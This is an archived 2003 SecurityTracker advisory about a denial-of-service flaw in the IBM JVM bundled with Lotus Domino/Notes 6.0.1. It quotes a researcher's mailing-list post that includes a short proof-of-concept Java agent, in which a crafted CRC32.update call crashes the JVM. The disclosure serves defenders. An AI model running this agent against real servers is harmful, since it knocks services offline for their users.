(Lotus Domino/Notes is Affected) Re: Sun Java JDK Bugs Allows Malicious Applets to Cause Denial of Service Conditions
|
|
SecurityTracker Alert ID: 1006494 |
|
SecurityTracker URL: http://securitytracker.com/id/1006494
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Apr 7 2003
|
Impact:
Denial of service via local system, error
|
Exploit Included: Yes
|
Version(s): 6.0.1 (IBM JVM 1.3.1)
|
Description:
Several denial of service bugs were reported in the Sun Java development kit (1.4.1_01). The IBM Java Virtual Machine (JVM) 1.3.1 distributed with Lotus Domino/Notes is affected. A malicious applet could crash the Java environment.
In the original report, it was noted that buffer "underflow" protections in several classes can be disabled by an applet that provides a special combination of parameters. The vulnerabilities are reportedly due to inadequate range checks which allow integer overflows to occur.
In this new report, Lotus Domino/Notes is reported to be affected due to the vulnerability in the IBM JVM. An applet that calls the "update" method of the CRC32 class can trigger an integer overflow in the java java.util.zip.* core libraries. This, in turn, reportedly executes a jni routine that cannot process the supplied input value. As a result, the Domino/Notes server/client will crash, according to the report.
|
Impact:
A malicious applet can cause the Java environment to crash. In the case of the Domino server, a locally executed applet can trigger the flaw. In the case of the Notes client, a remotely supplied applet can trigger the flaw.
|
Solution:
A fixed version of the underlying Sun JRE is available (see the Message History).
At the time of this entry, it is not clear if a fix exists for the IBM JDK/JVM or not.
|
Cause:
Exception handling error
|
Underlying OS:
Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)
|
|
Message History:
This archive entry is a follow-up to the message listed below.
|
Source Message Contents
|
Date: Sun, 6 Apr 2003 23:11:27 +0200 (MES)
Subject: [VulnWatch] Java Agent freezes Lotus Notes and Domino 6.0.1 (fwd)
|
Hi,
the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1
and Lotus Notes 6.0.1 to crash. After calling the agent a huge amount of memory
is not freed and causes the server machine (observed on MS XP) to
freeze and deny further service.
IMPLICATIONS
- If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
- if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.
ANALYSIS:
The call to the "update" method of the CRC32 raises an integer overflow
in the java java.util.zip.* core libraries which triggers a jni routine
that cannot handle the extreme high input value.
HISTORY:
This vulnerability has already been detected in the Sun JDK
(http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
and was disclosed at Blackhat Windows 2003.
The background of this bugs is described at www.illegalaccess.org
Sincerely
Marc Schoenefeld
=========================Agent Source Code===========================
import lotus.domino.*;
import java.util.zip.*;
public class JavaAgent extends AgentBase {
public void NotesMain() {
try {
Session session = getSession();
AgentContext agentContext =
session.getAgentContext();
CRC32 crc32 = new CRC32();
crc32.update(new byte[0], 4, 0x7ffffffc);
// (Your code goes here)
} catch(Exception e) {
e.printStackTrace();
}
}
}
=========================Agent Source Code===========================
--
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous
Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
[ PGP Signature ok - Sun Apr 6 23:10:07 MES 2003 ]
|
|
